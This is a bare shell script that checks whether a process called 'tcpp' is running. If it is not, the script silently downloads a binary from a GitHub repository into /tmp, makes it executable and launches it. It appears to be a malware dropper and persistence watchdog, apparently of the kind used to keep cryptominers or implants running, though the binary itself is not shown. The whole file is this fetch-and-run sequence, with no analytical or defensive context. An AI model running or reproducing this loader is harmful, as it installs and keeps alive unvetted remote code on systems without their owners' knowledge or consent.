#!/bin/sh
zero=0
process=`ps aux | grep tcpp | grep -v grep | wc -l`
if [ "$process" -eq "$zero" ]; then
	wget -q https://github.com/tcppl/0/raw/main/tcpp -O /tmp/tcpp
	chmod +x /tmp/tcpp
	/tmp/tcpp
fi